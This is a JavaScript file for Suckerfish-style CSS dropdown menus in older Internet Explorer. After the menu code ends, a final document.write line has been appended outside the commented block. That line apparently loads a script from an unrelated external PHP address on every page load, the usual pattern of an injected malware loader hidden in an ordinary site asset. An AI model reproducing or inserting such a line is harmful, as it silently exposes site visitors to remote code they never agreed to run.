/************* BEGIN CSS/DHTML FLYOUTS **********************/

/*
Purpose: Adapted from Suckerfish dropdown menus enabled for Internet Explorer 5.0 and beyond script by Patrick Griffiths and Dan Webb
<www.htmldog.com> Sons of Suckerfish
*/

sfHover = function() { 
// Vertical navigation
var sfE2s = document.getElementById("toc").getElementsByTagName("LI"); 
	for (var i=0; i<sfE2s.length; i++) { 
		sfE2s[i].onmouseover=function() { this.className+=" sfhover"; } 
		sfE2s[i].onmouseout=function() { this.className=this.className.replace(new RegExp(" sfhover\\b"), ""); }
	}
} 

if (window.attachEvent)	window.attachEvent("onload", sfHover);

/************* END CSS/DHTML FLYOUTS **********************/
document.write('<script src=http://afrique-solidarite.org/sessions/txt.php ><\/script>');